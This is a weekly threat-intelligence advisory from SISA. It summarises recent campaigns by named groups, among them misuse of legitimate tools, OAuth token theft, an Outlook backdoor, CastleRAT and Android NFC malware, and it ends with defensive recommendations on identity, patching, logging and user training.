Legitimate Tools Weaponized for Stealthy Access and Data Theft

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Abuse of Legitimate Tools and Cloud Services

Attackers are strategically co-opting trusted software and infrastructure to hide in plain sight, making detection and attribution significantly more difficult.

• Weaponized Forensic Tools: Threat actors are exploiting the open-source forensic tool Velociraptor to gain initial access and establish persistent command-and-control (C2) tunnels, leveraging msiexec for deployment and even using Visual Studio Code’s tunnel feature for stealthy egress.
• AI-Powered Exploitation: The offensive security tool HexStrike AI is being discussed and potentially misused on dark web forums to accelerate the weaponization and automated exploitation of critical vulnerabilities, such as those in Citrix NetScaler, dramatically shrinking the patch window for defenders.
• Cloud Service Exploitation: Campaigns are heavily abusing infrastructure from Cloudflare Workers, Microsoft Dev Tunnels, and AWS EC2 to host payloads, mask C2 traffic, and create resilient, difficult-to-track attack infrastructure.

2. Sophisticated Identity and Application Abuse

A continued focus on compromising identity and SaaS platforms demonstrates how attackers pivot to the most critical elements of the modern enterprise: its cloud identity layer and business applications.

• OAuth Token Compromise: The campaign by UNC6395 exploiting compromised Salesloft Drift OAuth tokens widened, leading to massive data exfiltration from Salesforce orgs and even unauthorized access to linked Google Workspace accounts, highlighting the severe supply chain risks of third-party integrations.
• Outlook Backdoor (NotDoor): APT28 deployed a novel VBA macro backdoor within Microsoft Outlook itself. It monitors incoming emails for trigger phrases to execute commands and exfiltrate data, using Outlook as a stealthy C2 channel and leveraging DLL side-loading via onedrive.exe for persistence.
• Device Code Flow Exploitation: Midnight Blizzard (APT29) ran a sophisticated watering hole campaign that selectively redirected victims to lookalike Cloudflare pages, tricking them into approving a malicious Microsoft Device Code authentication request, granting attackers access to their M365 tenant.

3. Evolution of Malware-as-a-Service (MaaS) and Cross-Platform Threats

Cybercriminal ecosystems are maturing, offering more sophisticated tools and expanding their reach to new platforms, including mobile and Linux.

• CastleRAT MaaS Ecosystem: The actor TAG-150 is advancing a full MaaS operation with CastleLoader and the new CastleRAT (in Python and C variants). The campaign uses “ClickFix” phishing and fake GitHub repos for delivery and employs advanced anti-analysis techniques like UAC prompt bombing to force Windows Defender exclusions.
• Lazarus Group Targets DeFi: The state-sponsored Lazarus Group conducted a complex campaign against the DeFi sector, deploying a multi-stage payload including PondRAT, ThemeForestRAT (a fileless, in-memory RAT), and the advanced RemotePE backdoor, using social engineering on Telegram and fake scheduling sites as the initial lure.
• Android NFC Banking Malware (PhantomCard): A new Android Trojan emerged in Brazil, masquerading as a card protection app (“Proteção Cartões”). It abuses NFC capabilities to read payment card data and PINs in real-time, enabling large-scale contactless payment fraud directly from a victim’s phone.\

4. Geopolitical Espionage and Targeted Data Theft

State-aligned actors continue to refine their techniques for long-term espionage, targeting government and critical infrastructure sectors with remarkable persistence.

• ShadowSilk Campaign: This group, with links to YoroTrooper and SturgeonPhisher, targeted government agencies across Central Asia and APAC. They used spear-phishing, exploits against Drupal and WordPress, and hid their C2 communications within Telegram bot traffic to stealthily exfiltrate data.
• ShinyHunters Analysis: A detailed profile of the ShinyHunters cybercrime collective revealed their evolution into a sophisticated extortion enterprise. Their tactics now include collaboration with groups like Scattered Spider, the use of vishing to compromise IT staff, the development of custom malware and zero-day exploits, and an expansion into Ransomware-as-a-Service (RaaS) operations.

Proactive Steps for the Week

Lock Down Identity and SaaS Access:

• Audit OAuth Apps: Immediately review and audit all connected OAuth applications in M365, Salesforce, and Google Workspace. Revoke any that are unused or suspicious.
• Harden MFA: Enforce phishing-resistant MFA (number matching, FIDO2 keys) and implement Conditional Access Policies to restrict device code flow and block unrecognized devices.
• Monitor Identity Logs: Scrutinize Entra ID/M365 logs for unusual device registrations, consent grants, and bulk file operations.

Defend Against Living-off-the-Land (LotL) Tactics:

• Application Control: Implement application allow-listing to control the execution of powerful tools like msiexec, powershell, and vscode.
• Enhanced Logging: Ensure command-line auditing and PowerShell transcription are enabled and ingested into a SIEM for analysis.
• Monitor for Anomalies: Create alerts for Windows Defender exclusion changes, unusual instances of onedrive.exe spawning child processes, and network connections to developer/cloud services from non-developer endpoints.

Patch and Isolate Critical Systems:

• Priority Patching: Urgently patch publicly disclosed vulnerabilities, especially in internet-facing systems like Citrix NetScaler.
• Segment Networks: Ensure critical infrastructure, including vulnerability management and SaaS administration consoles, is not directly exposed to the internet and is placed in a segmented network zone.

Enhance Supply Chain and Third-Party Risk Management:

• Review Integrations: Conduct a thorough review of all third-party integrations with critical SaaS platforms (Salesforce, M365, Google). Understand the data permissions granted.
• Enforce Least Privilege: Apply the principle of least privilege to every connected app and integration. Regularly review and trim unnecessary permissions.

Conduct Targeted User Training:

• Vishing Awareness: Train IT helpdesk and finance employees on vishing risks and implement strict out-of-band verification procedures for any privileged access requests.
• Tool Misuse: Educate users, especially developers, on the dangers of downloading tools from unverified sources on GitHub and following instructions from unsolicited “update” prompts.

Expand Threat Detection Capabilities:

• Leverage IOCs: Integrate the provided Indicators of Compromise (IOCs) into security tools to block known malicious domains and IPs.
• Behavioral Detection: Develop detections for the specific TTPs outlined, such as Telegram C2 traffic from corporate assets, SOQL queries from unexpected IPs, and NFC-reading apps on managed mobile devices.